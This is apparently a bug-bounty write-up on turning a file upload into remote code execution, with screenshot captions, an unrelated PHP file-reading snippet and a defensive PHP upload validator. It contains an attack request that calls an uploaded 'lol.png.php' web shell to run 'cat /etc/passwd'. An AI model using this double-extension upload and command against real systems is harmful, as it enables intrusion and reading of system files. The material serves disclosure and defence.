File Upload to RCE

Let’s go……

(Protect us, O Lord)
alt="photo here"
cannot be displayed because it contains errors.
Profile updated successfully
HTML, JS and some PHP code work, but none of the parameters work
All commands passed in the parameter are blocked and do not work
oh nice…
One more, please, boss 😂😂 that's enough 😂😂
// Open the file and read it line by line.
$handle = fopen("inputfile.txt", "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
        // process the line read.
    }
    fclose($handle);
} else {
    // error opening the file.
}
happy and sad
example.com/uploads/96/lol.png.php?c=cat /etc/passwd
All Done

I reported that as RCE and the severity became P1 … :)
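The upload above kept a client-chosen name ending in .php (lol.png.php) inside a web-served directory. The following is an added example, not code from the original post or the affected application: a server-side check that rejects such names, decides the type from the file's bytes, and stores the file under a server-generated name. The function name safeUploadName, both constants and the sample files are hypothetical, and the PHP fileinfo extension is assumed to be enabled.

```php
<?php
declare(strict_types=1);

const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif'];
// Detected content type => the only extension the server will write.
const TYPE_TO_EXTENSION = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

/**
 * Returns a server-generated name for an upload, or null to reject it.
 * $clientName is the name the browser sent; $tmpPath is the uploaded temp file.
 */
function safeUploadName(string $clientName, string $tmpPath): ?string
{
    // Treat every dot-separated part after the first as an extension, so
    // "lol.png.php" fails on "php" instead of passing on "png".
    $parts = explode('.', strtolower(basename($clientName)));
    array_shift($parts);
    if ($parts === [] || array_diff($parts, ALLOWED_EXTENSIONS) !== []) {
        return null;
    }
    // Decide the type from the file's bytes, not the name or the client's Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !array_key_exists($mime, TYPE_TO_EXTENSION)) {
        return null;
    }
    // The stored name contains no client-supplied text.
    return bin2hex(random_bytes(16)) . '.' . TYPE_TO_EXTENSION[$mime];
}

// Constructed samples: a 1x1 PNG and a plain-text file, written to temp files.
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));
$text = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($text, "constructed sample: not an image\n");

// Valid image with a safe name, valid image with a .php suffix, non-image named .png.
foreach ([['avatar.png', $png], ['lol.png.php', $png], ['avatar.png', $text]] as [$name, $path]) {
    $stored = safeUploadName($name, $path);
    printf("%-12s => %s\n", $name, $stored ?? 'rejected');
}
unlink($png);
unlink($text);
```

A file can be a valid image and still carry PHP in its metadata, so the content check alone is not the control. What prevents execution is that the stored name never ends in an executable extension, together with serving the uploads directory with script execution disabled.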

Interested in infosec || CTF Player || Pentester || Bug Hunter || Security Researcher

Ahmed Magdy